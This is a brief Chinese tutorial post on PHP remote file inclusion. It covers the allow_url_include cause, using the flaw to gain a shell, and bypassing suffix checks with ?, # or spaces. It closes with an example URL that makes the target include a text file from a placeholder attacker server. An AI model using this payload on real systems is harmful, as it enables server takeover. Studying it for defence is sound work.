• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

php远程文件包含

开发技术 开发技术 3小时前 2次浏览

产生原因

PHP的配置选项allow_url_include为ON,则include/require函数可以加载远程文件

一般用途

远程包含含有php代码的txt文件,服务器进行解析后执行相关操作收集信息或getshell
当进行有限制的远程文件包含漏洞时,例如包含文件同时在文件名后加后缀html,则可以用?#和空格等绕过(fuzz大法好)

利用

http://127.0.0.1/index.php?page=http://远程服务器ip/2.txt


程序员灯塔
转载请注明原文链接:php远程文件包含
喜欢 (0)